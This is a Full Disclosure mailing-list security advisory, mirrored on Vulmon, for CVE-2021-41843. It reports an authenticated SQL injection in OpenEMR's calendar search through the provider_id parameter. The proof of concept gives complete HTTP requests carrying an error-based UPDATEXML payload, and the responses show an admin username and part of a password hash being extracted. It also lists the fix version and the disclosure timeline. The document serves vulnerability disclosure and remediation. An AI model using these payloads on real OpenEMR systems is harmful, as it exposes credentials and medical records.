Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Trovent Security Advisory 2109-01 / CVE-2021-41843: Authenticated SQL injection in OpenEMR calendar search

Related Vulnerabilities: CVE-2021-41843  
Source 
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="37"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#38">By Date</a>
<a href="39"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="37"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#38">By Thread</a>
<a href="39"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>

</div>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">Trovent Security Advisory 2109-01 / CVE-2021-41843:	Authenticated SQL injection in OpenEMR calendar search</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: Stefan Pietsch &lt;s.pietsch () trovent io&gt;


<em>Date</em>: Wed, 15 Dec 2021 12:59:42 +0000


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;"># Trovent Security Advisory 2109-01 #
#####################################


Authenticated SQL injection in OpenEMR calendar search
######################################################


Overview
########

Advisory ID: TRSA-2109-01
Advisory version: 1.0
Advisory status: Public
Advisory URL: <a rel="nofollow" href="https://trovent.io/security-advisory-2109-01">https://trovent.io/security-advisory-2109-01</a>
Affected product: OpenEMR web application
Tested versions: 6.0.0, 6.1.0-dev
Vendor: OpenEMR project, <a rel="nofollow" href="https://www.open-emr.org">https://www.open-emr.org</a>
Credits: Trovent Security GmbH, Stefan Pietsch


Detailed description
####################

The OpenEMR web application is a medical practice management software and can
be used to store electronic medical records.
Trovent Security GmbH discovered an SQL injection vulnerability in the search
function of the calendar module. The parameter 'provider_id' is injectable.
The attacker needs a valid user account to access the calendar module of the
web application. It is possible to read data from all tables of the database.

Severity: Medium
CVSS Score: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
CWE ID: CWE-89
CVE ID: CVE-2021-41843


Proof of concept
################

(1) HTTP request to read a username from the database table 'openemr.users_secure':
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

POST /interface/main/calendar/index.php?module=PostCalendar&amp;func=search HTTP/1.1
Content-Length: 324
Host: 172.18.0.3
Content-Type: application/x-www-form-urlencoded
Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q
Connection: close

pc_keywords=TRVNT&amp;pc_keywords_andor=AND&amp;pc_category=&amp;start=09%2F16%2F2021&amp;end=09%2F23%2F2021&amp;
provider_id=%28UPDATEXML%281%2CCONCAT%280x2e%2C0x20%2C%28SELECT%20MID%28%28IFNULL%28CAST%28username
%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C22%29%20FROM%20openemr.users_secure%20ORDER%20BY%20id%29%29%2C1%29%29&amp;pc_facility=&amp;submit=Submit

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


(2) HTTP response to (1):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HTTP/1.1 200 OK
Date: Fri, 17 Sep 2021 07:26:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; expires=Fri, 17-Sep-2021 15:13:28 GMT; 
Max-Age=28000; path=/; SameSite=Strict
Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; expires=Fri, 17-Sep-2021 15:13:29 GMT; 
Max-Age=28000; path=/; SameSite=Strict
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
Content-Length: 27
Connection: close
Content-Type: text/html; charset=utf-8

XPATH syntax error: 'admin'

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


(3) HTTP request to read a password hash from the database table 'openemr.users_secure':
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

POST /interface/main/calendar/index.php?module=PostCalendar&amp;func=search HTTP/1.1
Content-Length: 324
Host: 172.18.0.3
Content-Type: application/x-www-form-urlencoded
Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q
Connection: close

pc_keywords=TRVNT&amp;pc_keywords_andor=AND&amp;pc_category=&amp;start=09%2F16%2F2021&amp;end=09%2F23%2F2021&amp;
provider_id=%28UPDATEXML%281%2CCONCAT%280x2e%2C0x20%2C%28SELECT%20MID%28%28IFNULL%28CAST%28password
%20AS%20NCHAR%29%2C0x20%29%29%2C1%2C22%29%20FROM%20openemr.users_secure%20ORDER%20BY%20id%29%29%2C1%29%29&amp;pc_facility=&amp;submit=Submit

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


(4) HTTP response to (3):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HTTP/1.1 200 OK
Date: Fri, 17 Sep 2021 07:27:29 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; expires=Fri, 17-Sep-2021 15:14:09 GMT; 
Max-Age=28000; path=/; SameSite=Strict
Set-Cookie: OpenEMR=bofmeFnRf2xbYcrhtHxOApQJYZuoVfFnv8lH6luSuvTrw85Q; expires=Fri, 17-Sep-2021 15:14:09 GMT; 
Max-Age=28000; path=/; SameSite=Strict
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
Content-Length: 44
Connection: close
Content-Type: text/html; charset=utf-8

XPATH syntax error: '$2y$10$ukudH2lRSW2vKX.'

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Solution / Workaround
#####################

Limit access to the calendar search function until the vulnerability is fixed.

Fixed in OpenEMR version 6.0.0 patch 3, verified by Trovent.


History
#######

2021-09-16: Vulnerability found
2021-09-29: Advisory created &amp; vendor contacted
2021-09-30: Vendor acknowledged vulnerability, CVE ID requested
2021-10-01: CVE ID received
2021-10-19: Vendor releases OpenEMR version 6.0.0 patch 3
2021-12-14: Add information about fixed version
2021-12-15: Advisory published
</pre><p><strong>Attachment:
<a href="att-38/signature_asc.bin"><tt>signature.asc</tt></a></strong>

<em>Description:</em> OpenPGP digital signature</p>
<pre style="margin: 0em;">
_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a></pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="37"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#38">By Date</a>
<a href="39"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="37"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#38">By Thread</a>
<a href="39"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>Trovent Security Advisory 2109-01 / CVE-2021-41843:	Authenticated SQL injection in OpenEMR calendar search</strong> <em>Stefan Pietsch (Dec 17)</em>
</li></ul>


<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started